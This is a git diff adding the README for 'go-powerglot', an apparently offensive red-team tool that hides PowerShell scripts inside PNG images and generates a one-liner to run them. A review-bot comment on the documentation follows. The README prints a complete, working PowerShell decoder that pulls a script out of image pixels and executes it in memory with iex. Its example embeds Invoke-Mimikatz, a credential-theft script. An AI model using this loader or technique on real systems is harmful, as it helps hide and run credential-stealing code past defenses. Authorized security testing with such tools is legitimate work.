Diffstat (limited to 'README.md')
-rw-r--r--  README.md  108
1 files changed, 108 insertions, 0 deletions
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..72c28a8
--- /dev/null
+++ b/README.md
@@ -0,0 +1,108 @@
+# go-powerglot
+
+`go-powerglot` is an offensive security utility that embeds PowerShell scripts into PNG images using pixel-level steganography. It transforms ordinary PNG files into covert script carriers and provides a one-liner PowerShell payload for in-memory script extraction and execution. Inspired by [https://github.com/peewpw/Invoke-PSImage](https://github.com/peewpw/Invoke-PSImage)
+
+> **WARNING**: This tool is intended for **authorized security assessments only**. Misuse may violate laws or regulations. The author disclaims any responsibility for unlawful use. Always obtain explicit permission before conducting any security tests.
+
+## Features
+
+- **Steganography**: Embeds PowerShell script bytes into image pixels using RGB channel manipulation.
+- **PowerShell Payload Generator**: Automatically generates a one-liner that decodes and executes the script from the PNG image.
+- **Portable**: Single binary with no external dependencies beyond Go's standard library.
+- **File Size & Dimension Checks**: Ensures the image has sufficient capacity to store the entire script.
+
+## Installation
+
+### Prerequisites
+
+- **Go**: Version 1.21 or later.
+- **Make**: For building with the provided Makefile.
+- **Git**: To clone the repository.
+
+### Steps
+
+- Clone the repository:
+
+```
+$ git clone https://cgit.heqnx.com/go-powerglot
+$ cd go-powerglot
+```
+
+- Install dependencies:
+
+```
+$ go mod tidy
+```
+
+- Build for all platforms:
+
+```
+$ make all
+```
+
+- Binaries will be generated in the build/ directory for Linux, Windows, and macOS; alternatively, build for a specific platform:
+
+```
+$ make linux-amd64
+$ make windows-amd64
+$ make darwin-arm64
+```
+
+- (Optional) Run directly with Go:
+
+```
+$ go run main.go -exec </path/to/png> -image </path/to/input.png> -out </path/to/out.png> -script </path/to/input.ps1>
+```
+
+## Usage
+
+### Command-Line Flags
+
+```
+Usage of ./go-powerglot:
+ -exec string
+ execution path to be used inside the generated PowerShell one-liner
+ -image string
+ input PNG file to embed the script into
+ -out string
+ output PNG file with embedded script
+ -script string
+ PowerShell script file to embed
+```
+
+## Examples
+
+### Embed a PowerShell script into a PNG and generate a decoder:
+
+```
+$ ./go-powerglot \
+ -image img/windows-11-5689x2400.png \
+ -script Invoke-Mimikatz.ps1 \
+ -out test.png \
+ -exec C:\Users\Public\test.png
+```
+
+- Example output:
+
+```
+[inf] script size: 3625037 bytes
+[inf] image size: 2702073 bytes
+[inf] png dimensions: 5689x2400
+[inf] created output file: /home/heqnx/go-powerglot/test.png
+[inf] successfully embedded Invoke-Mimikatz.ps1 into test.png
+[inf] powershell decoder snippet:
+sal a new-object;add-type -a system.drawing;$g=a system.drawing.bitmap("C:\Users\Public\test.png");$o=a byte[] 13653600;(0..2399)|%{foreach($x in 0..5688) {$p=$g.getpixel($x,$_);$o[$_*5689+$x]=[math]::floor(($p.r -band 0x0f)*16) + ($p.g -band 0x0f);}};$g.dispose();iex([system.text.encoding]::ascii.getstring($o[0..3625036]))
+```
+
+- Use the generated PowerShell snippet to decode and execute the embedded script:
+
+- The PowerShell snippet uses pixel decoding logic to reconstruct the original script in memory and execute it using `iex`.
+
+## Disclaimer
+
+`go-powerglot` is provided "as is" without any warranties. The author and contributors are not responsible for damages or misuse. This tool is for research and authorized red team operations only.
+
+## License
+
+This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the [LICENSE](LICENSE) file for more details.
+
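Review bot: the README's description of the encoding does not match its own decoder, and it should document the actual scheme. The Features list says the script is embedded "using RGB channel manipulation", but the generated one-liner in the Examples section reconstructs each byte from only the low nibble of the red and green channels (`($p.r -band 0x0f)*16 + ($p.g -band 0x0f)`), i.e. 8 bits per pixel; this is also what makes the capacity check work, since a 5689x2400 image gives exactly 13653600 bytes (`$o=a byte[] 13653600`), of which the first 3625037 are the script. Suggest stating the width*height byte capacity and the R/G low-nibble layout under "Steganography" and "File Size & Dimension Checks" so users can judge whether an image is large enough before running the tool. Two smaller documentation points in the same hunk: the "Install dependencies" step (`go mod tidy`) contradicts the Portable feature claiming no dependencies beyond the standard library, so either drop the step or note that it is a no-op; and the bullet "Use the generated PowerShell snippet to decode and execute the embedded script:" ends in a colon with no content following it, so it should be merged with the next bullet or given the text it was meant to introduce.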